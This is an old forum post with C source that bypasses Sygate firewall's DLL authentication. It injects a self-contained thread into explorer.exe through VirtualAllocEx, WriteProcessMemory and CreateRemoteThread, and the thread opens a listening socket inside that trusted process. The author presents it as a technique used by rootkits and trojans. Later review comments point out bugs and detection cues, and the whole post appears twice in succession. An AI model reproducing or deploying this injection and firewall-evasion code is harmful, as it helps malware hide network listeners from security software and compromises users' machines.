bypass dll authentication in sygate and such
2006-04-26 02:56
akcom
Sygate uses a very 'spiff' method that limits injecting a DLL into a process, a popular technique for rootkits and trojans alike. This is just some example code to bypass Sygate's DLL authentication; it's very simple, but it's just to get the concept across. It functions by allocating a function in a remote application (in this example, explorer.exe) and then executing it as a thread. The thread then sets up a listening socket, all of which should bypass Sygate's DLL authentication.
I'm not a big fan of commenting, so if you have any questions, just provide me with the line and I will explain it.
#define WIN32_LEAN_AND_MEAN
#include
#include
#include
#include
#include
// Function-pointer types mirroring the Winsock 2 and kernel32 exports the
// injected thread needs. ThreadProc calls every API through one of these
// pointers (resolved at run time with GetProcAddress) rather than through
// this image's import table, because its bytes are copied into another
// process where this image's imports are not present.
// NOTE(review): the #include lines above lost their header names during
// extraction; the names used here (WSAAPI, SOCKET, LPWSADATA, HMODULE, ...)
// come from the Winsock / Win32 headers — presumably winsock2.h and
// windows.h — confirm against the original source.
typedef int (WSAAPI *LPWSAStartup)( IN WORD wVersionRequested, OUT LPWSADATA lpWSAData );
typedef SOCKET (WSAAPI *LPsocket)( IN int af, IN int type, IN int protocol );
typedef int (WSAAPI *LPbind)( IN SOCKET s, IN const struct sockaddr FAR * name, IN int namelen );
typedef int (WSAAPI *LPlisten)( IN SOCKET s, IN int backlog );
typedef SOCKET (WSAAPI *LPaccept)( IN SOCKET s, OUT struct sockaddr FAR * addr, IN OUT int FAR * addrlen );
typedef int (WSAAPI *LPclosesocket)( IN SOCKET s );
typedef int (WSAAPI *LPsend)( IN SOCKET s, IN const char FAR * buf, IN int len, IN int flags );
typedef HMODULE (WINAPI *LPLoadLibrary)( IN LPCSTR lpLibFileName );
typedef FARPROC (WINAPI *LPGetProcAddress)( IN HMODULE hModule, IN LPCSTR lpProcName );
// Parameter block handed to the remote thread. It is written into the target
// process with WriteProcessMemory (see main) and is the only data ThreadProc
// may touch: library and export names live in fixed-size inline arrays,
// presumably so the copied code carries no pointers into this image's
// read-only data, which would be invalid in the target's address space.
typedef struct _INJINFO
{
char c_Lib[16];          // DLL to load in the target ("ws2_32.dll")
char c_WSAStartup[12];   // export names resolved via GetProcAddr below
char c_Socket[8];
char c_Bind[8];
char c_Listen[8];
char c_Accept[8];
char c_CloseSocket[16];
char c_send[8];
char c_data[45];         // payload sent to each client; full 45 bytes are sent
LPLoadLibrary LoadLib;       // kernel32!LoadLibraryA, filled in by main
LPGetProcAddress GetProcAddr; // kernel32!GetProcAddress, filled in by main
} INJINFO, *PINJINFO;
// Thread body that main copies byte-for-byte into the target process and
// starts with CreateRemoteThread. It must be fully self-contained: every
// external call goes through the function pointers and name strings carried
// in the INJINFO it receives, never through this image's imports or string
// literals. Changing the code here changes the bytes that get copied.
// Parameter: lpParams — pointer, in the target's address space, to an INJINFO.
// Returns 0 once accept() fails; until then it loops indefinitely.
static DWORD WINAPI ThreadProc( LPVOID lpParams )
{
PINJINFO info = (PINJINFO)lpParams;
// Load ws2_32 inside the target and resolve the seven Winsock exports by
// name. None of the results is checked: a NULL from LoadLib or GetProcAddr
// is called through below, which would crash the host process (explorer.exe
// in this example) rather than fail gracefully.
HMODULE hLib = info->LoadLib( info->c_Lib );
LPWSAStartup wsastartup = (LPWSAStartup)info->GetProcAddr( hLib, info->c_WSAStartup );
LPsocket wsasocket = (LPsocket)info->GetProcAddr( hLib, info->c_Socket );
LPbind wsabind = (LPbind)info->GetProcAddr( hLib, info->c_Bind );
LPlisten wsalisten = (LPlisten)info->GetProcAddr( hLib, info->c_Listen );
LPaccept wsaaccept = (LPaccept)info->GetProcAddr( hLib, info->c_Accept );
LPclosesocket wsaclosesocket = (LPclosesocket)info->GetProcAddr( hLib, info->c_CloseSocket );
LPsend wsasend = (LPsend)info->GetProcAddr( hLib, info->c_send );
SOCKADDR_IN sAddr;
sAddr.sin_addr.s_addr = INADDR_ANY;   // listens on every interface
// Assigned in host byte order with no htons(): on a little-endian host the
// port actually bound is the byte-swapped value 0xADDE (44510), not 0xDEAD.
// Relevant when looking for this listener in netstat / firewall logs.
sAddr.sin_port = 0xDEAD;
sAddr.sin_family = AF_INET;
WSADATA wsa;
wsastartup( 0x0202, &wsa );   // requests Winsock 2.2; return value ignored
SOCKET ServerSocket = wsasocket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
wsabind( ServerSocket, (LPSOCKADDR)&sAddr, sizeof(sAddr) );   // unchecked
wsalisten( ServerSocket, 5 );   // unchecked
SOCKET cli;
// Accept loop: every client receives the whole 45-byte c_data buffer,
// zero padding included, and the client socket is never closed, so one
// socket handle leaks inside the host process per connection.
while (true)
{
cli = wsaaccept( ServerSocket, NULL, NULL );
if ( cli == SOCKET_ERROR )
break;
wsasend( cli, info->c_data, 45, 0 );
}
wsaclosesocket( ServerSocket );
return 0;
}
// Empty MSVC "naked" function used only as an address marker: main takes
// end_proc - ThreadProc as the byte length of ThreadProc. That relies on the
// compiler/linker placing end_proc directly after ThreadProc with nothing in
// between, which is not guaranteed (optimisation, padding or incremental-link
// thunks can break it); it is never called.
static void __declspec( naked ) end_proc()
{
}
// Global parameter block copied verbatim (sizeof(info) bytes) into the
// target. Each string initializer is shorter than its array, so the
// remaining bytes are zero-filled; c_data is therefore "slutted" followed
// by zeros up to 45 bytes. The two NULL function pointers are filled in by
// main before the block is written.
INJINFO info =
{
"ws2_32.dll",
"WSAStartup",
"socket",
"bind",
"listen",
"accept",
"closesocket",
"send",
"slutted",
NULL,
NULL
};
// Injector entry point: resolves LoadLibraryA/GetProcAddress, finds
// explorer.exe through its taskbar window, then performs the canonical
// remote-thread injection sequence — OpenProcess(PROCESS_ALL_ACCESS),
// VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory of the
// ThreadProc bytes plus the INJINFO block, CreateRemoteThread. This exact
// API chain is what host-based sensors and EDR products key on when
// detecting code injection. argc/argv are unused; returns 0 on every path.
// NOTE: every "/n" in the printf strings is a literal slash-n, not "\n".
int main(int argc, char* argv[])
{
// kernel32 function addresses are reused inside the target as-is, which
// presumably relies on kernel32 being mapped at the same base in both
// processes. hLib and both GetProcAddress results are unchecked.
HMODULE hLib = LoadLibrary( "kernel32.dll" );
info.LoadLib = (LPLoadLibrary)GetProcAddress( hLib, "LoadLibraryA" );
info.GetProcAddr = (LPGetProcAddress)GetProcAddress( hLib, "GetProcAddress" );
DWORD dwPID;
// Locate explorer.exe via its tray window. If FindWindow returns NULL the
// PID lookup fails and dwPID is presumably left uninitialized — confirm.
GetWindowThreadProcessId( FindWindow( "Shell_TrayWnd", NULL ), &dwPID );
printf( "explorer pid: 0x%x/n", dwPID );
HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, dwPID );
if ( hProcess == NULL )
{
printf( "error opening process/n" );
return 0;
}
// Byte length of ThreadProc taken as the distance to the next function;
// assumes end_proc is emitted immediately after ThreadProc (see end_proc)
// and that pointers fit in a DWORD, i.e. a 32-bit build.
DWORD ProcSize = (DWORD)end_proc - (DWORD)ThreadProc;
printf( "proc size: %u/n", ProcSize );
// RWX region for the code copy, plus 1024 bytes for the parameter block
// (only sizeof(info) of it is written). Neither region is released on the
// early-return path below, and hProcess is never closed on any path.
LPVOID lpProc = VirtualAllocEx( hProcess, NULL, ProcSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
LPVOID lpParams = VirtualAllocEx( hProcess, NULL, 1024, MEM_COMMIT, PAGE_READWRITE );
if ( !lpProc || !lpParams )
{
printf( "error allocating mem/n" );
return 0;
}
// %X with pointer arguments is a format/type mismatch (%p is the matching
// specifier); harmless on 32-bit, wrong on 64-bit.
printf( "memory allocated at 0x%X and 0x%X/n", lpProc, lpParams );
DWORD dwWritten;
// Both writes are unchecked and dwWritten is never examined.
WriteProcessMemory( hProcess, lpProc, ThreadProc, ProcSize, &dwWritten );
WriteProcessMemory( hProcess, lpParams, &info, sizeof( info ), &dwWritten );
printf( "memory written/n" );
DWORD ThreadID;
HANDLE hThread = CreateRemoteThread( hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpProc, lpParams, 0, &ThreadID );
if ( hThread == NULL )
{
printf( "error creating thread/n" );
}
else
{
// Blocks indefinitely while the remote thread sits in its accept loop;
// hThread is never closed.
WaitForSingleObject( hThread, INFINITE );
}
// MEM_DECOMMIT frees the pages but leaves the address reservation in the
// target; this is also reached only after the wait above returns.
VirtualFreeEx( hProcess, lpProc, ProcSize, MEM_DECOMMIT );
VirtualFreeEx( hProcess, lpParams, 1024, MEM_DECOMMIT );
printf( "done/n" );
return 0;
}
Sygate uses a very 'spiff' method that limits injecting a DLL into a process, a popular technique for rootkits and trojans alike. This is just some example code to bypass Sygate's DLL authentication; it's very simple, but it's just to get the concept across. It functions by allocating a function in a remote application (in this example, explorer.exe) and then executing it as a thread. The thread then sets up a listening socket, all of which should bypass Sygate's DLL authentication.
I'm not a big fan of commenting, so if you have any questions, just provide me with the line and I will explain it.
#define WIN32_LEAN_AND_MEAN
#include
#include
#include
#include
#include
// Function-pointer types mirroring the Winsock 2 and kernel32 exports the
// injected thread needs. ThreadProc calls every API through one of these
// pointers (resolved at run time with GetProcAddress) rather than through
// this image's import table, because its bytes are copied into another
// process where this image's imports are not present.
// NOTE(review): the #include lines above lost their header names during
// extraction; the names used here (WSAAPI, SOCKET, LPWSADATA, HMODULE, ...)
// come from the Winsock / Win32 headers — presumably winsock2.h and
// windows.h — confirm against the original source.
typedef int (WSAAPI *LPWSAStartup)( IN WORD wVersionRequested, OUT LPWSADATA lpWSAData );
typedef SOCKET (WSAAPI *LPsocket)( IN int af, IN int type, IN int protocol );
typedef int (WSAAPI *LPbind)( IN SOCKET s, IN const struct sockaddr FAR * name, IN int namelen );
typedef int (WSAAPI *LPlisten)( IN SOCKET s, IN int backlog );
typedef SOCKET (WSAAPI *LPaccept)( IN SOCKET s, OUT struct sockaddr FAR * addr, IN OUT int FAR * addrlen );
typedef int (WSAAPI *LPclosesocket)( IN SOCKET s );
typedef int (WSAAPI *LPsend)( IN SOCKET s, IN const char FAR * buf, IN int len, IN int flags );
typedef HMODULE (WINAPI *LPLoadLibrary)( IN LPCSTR lpLibFileName );
typedef FARPROC (WINAPI *LPGetProcAddress)( IN HMODULE hModule, IN LPCSTR lpProcName );
// Parameter block handed to the remote thread. It is written into the target
// process with WriteProcessMemory (see main) and is the only data ThreadProc
// may touch: library and export names live in fixed-size inline arrays,
// presumably so the copied code carries no pointers into this image's
// read-only data, which would be invalid in the target's address space.
typedef struct _INJINFO
{
char c_Lib[16];          // DLL to load in the target ("ws2_32.dll")
char c_WSAStartup[12];   // export names resolved via GetProcAddr below
char c_Socket[8];
char c_Bind[8];
char c_Listen[8];
char c_Accept[8];
char c_CloseSocket[16];
char c_send[8];
char c_data[45];         // payload sent to each client; full 45 bytes are sent
LPLoadLibrary LoadLib;       // kernel32!LoadLibraryA, filled in by main
LPGetProcAddress GetProcAddr; // kernel32!GetProcAddress, filled in by main
} INJINFO, *PINJINFO;
// Thread body that main copies byte-for-byte into the target process and
// starts with CreateRemoteThread. It must be fully self-contained: every
// external call goes through the function pointers and name strings carried
// in the INJINFO it receives, never through this image's imports or string
// literals. Changing the code here changes the bytes that get copied.
// Parameter: lpParams — pointer, in the target's address space, to an INJINFO.
// Returns 0 once accept() fails; until then it loops indefinitely.
static DWORD WINAPI ThreadProc( LPVOID lpParams )
{
PINJINFO info = (PINJINFO)lpParams;
// Load ws2_32 inside the target and resolve the seven Winsock exports by
// name. None of the results is checked: a NULL from LoadLib or GetProcAddr
// is called through below, which would crash the host process (explorer.exe
// in this example) rather than fail gracefully.
HMODULE hLib = info->LoadLib( info->c_Lib );
LPWSAStartup wsastartup = (LPWSAStartup)info->GetProcAddr( hLib, info->c_WSAStartup );
LPsocket wsasocket = (LPsocket)info->GetProcAddr( hLib, info->c_Socket );
LPbind wsabind = (LPbind)info->GetProcAddr( hLib, info->c_Bind );
LPlisten wsalisten = (LPlisten)info->GetProcAddr( hLib, info->c_Listen );
LPaccept wsaaccept = (LPaccept)info->GetProcAddr( hLib, info->c_Accept );
LPclosesocket wsaclosesocket = (LPclosesocket)info->GetProcAddr( hLib, info->c_CloseSocket );
LPsend wsasend = (LPsend)info->GetProcAddr( hLib, info->c_send );
SOCKADDR_IN sAddr;
sAddr.sin_addr.s_addr = INADDR_ANY;   // listens on every interface
// Assigned in host byte order with no htons(): on a little-endian host the
// port actually bound is the byte-swapped value 0xADDE (44510), not 0xDEAD.
// Relevant when looking for this listener in netstat / firewall logs.
sAddr.sin_port = 0xDEAD;
sAddr.sin_family = AF_INET;
WSADATA wsa;
wsastartup( 0x0202, &wsa );   // requests Winsock 2.2; return value ignored
SOCKET ServerSocket = wsasocket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
wsabind( ServerSocket, (LPSOCKADDR)&sAddr, sizeof(sAddr) );   // unchecked
wsalisten( ServerSocket, 5 );   // unchecked
SOCKET cli;
// Accept loop: every client receives the whole 45-byte c_data buffer,
// zero padding included, and the client socket is never closed, so one
// socket handle leaks inside the host process per connection.
while (true)
{
cli = wsaaccept( ServerSocket, NULL, NULL );
if ( cli == SOCKET_ERROR )
break;
wsasend( cli, info->c_data, 45, 0 );
}
wsaclosesocket( ServerSocket );
return 0;
}
// Empty MSVC "naked" function used only as an address marker: main takes
// end_proc - ThreadProc as the byte length of ThreadProc. That relies on the
// compiler/linker placing end_proc directly after ThreadProc with nothing in
// between, which is not guaranteed (optimisation, padding or incremental-link
// thunks can break it); it is never called.
static void __declspec( naked ) end_proc()
{
}
// Global parameter block copied verbatim (sizeof(info) bytes) into the
// target. Each string initializer is shorter than its array, so the
// remaining bytes are zero-filled; c_data is therefore "slutted" followed
// by zeros up to 45 bytes. The two NULL function pointers are filled in by
// main before the block is written.
INJINFO info =
{
"ws2_32.dll",
"WSAStartup",
"socket",
"bind",
"listen",
"accept",
"closesocket",
"send",
"slutted",
NULL,
NULL
};
// Injector entry point: resolves LoadLibraryA/GetProcAddress, finds
// explorer.exe through its taskbar window, then performs the canonical
// remote-thread injection sequence — OpenProcess(PROCESS_ALL_ACCESS),
// VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory of the
// ThreadProc bytes plus the INJINFO block, CreateRemoteThread. This exact
// API chain is what host-based sensors and EDR products key on when
// detecting code injection. argc/argv are unused; returns 0 on every path.
// NOTE: every "/n" in the printf strings is a literal slash-n, not "\n".
int main(int argc, char* argv[])
{
// kernel32 function addresses are reused inside the target as-is, which
// presumably relies on kernel32 being mapped at the same base in both
// processes. hLib and both GetProcAddress results are unchecked.
HMODULE hLib = LoadLibrary( "kernel32.dll" );
info.LoadLib = (LPLoadLibrary)GetProcAddress( hLib, "LoadLibraryA" );
info.GetProcAddr = (LPGetProcAddress)GetProcAddress( hLib, "GetProcAddress" );
DWORD dwPID;
// Locate explorer.exe via its tray window. If FindWindow returns NULL the
// PID lookup fails and dwPID is presumably left uninitialized — confirm.
GetWindowThreadProcessId( FindWindow( "Shell_TrayWnd", NULL ), &dwPID );
printf( "explorer pid: 0x%x/n", dwPID );
HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, dwPID );
if ( hProcess == NULL )
{
printf( "error opening process/n" );
return 0;
}
// Byte length of ThreadProc taken as the distance to the next function;
// assumes end_proc is emitted immediately after ThreadProc (see end_proc)
// and that pointers fit in a DWORD, i.e. a 32-bit build.
DWORD ProcSize = (DWORD)end_proc - (DWORD)ThreadProc;
printf( "proc size: %u/n", ProcSize );
// RWX region for the code copy, plus 1024 bytes for the parameter block
// (only sizeof(info) of it is written). Neither region is released on the
// early-return path below, and hProcess is never closed on any path.
LPVOID lpProc = VirtualAllocEx( hProcess, NULL, ProcSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
LPVOID lpParams = VirtualAllocEx( hProcess, NULL, 1024, MEM_COMMIT, PAGE_READWRITE );
if ( !lpProc || !lpParams )
{
printf( "error allocating mem/n" );
return 0;
}
// %X with pointer arguments is a format/type mismatch (%p is the matching
// specifier); harmless on 32-bit, wrong on 64-bit.
printf( "memory allocated at 0x%X and 0x%X/n", lpProc, lpParams );
DWORD dwWritten;
// Both writes are unchecked and dwWritten is never examined.
WriteProcessMemory( hProcess, lpProc, ThreadProc, ProcSize, &dwWritten );
WriteProcessMemory( hProcess, lpParams, &info, sizeof( info ), &dwWritten );
printf( "memory written/n" );
DWORD ThreadID;
HANDLE hThread = CreateRemoteThread( hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpProc, lpParams, 0, &ThreadID );
if ( hThread == NULL )
{
printf( "error creating thread/n" );
}
else
{
// Blocks indefinitely while the remote thread sits in its accept loop;
// hThread is never closed.
WaitForSingleObject( hThread, INFINITE );
}
// MEM_DECOMMIT frees the pages but leaves the address reservation in the
// target; this is also reached only after the wait above returns.
VirtualFreeEx( hProcess, lpProc, ProcSize, MEM_DECOMMIT );
VirtualFreeEx( hProcess, lpParams, 1024, MEM_DECOMMIT );
printf( "done/n" );
return 0;
}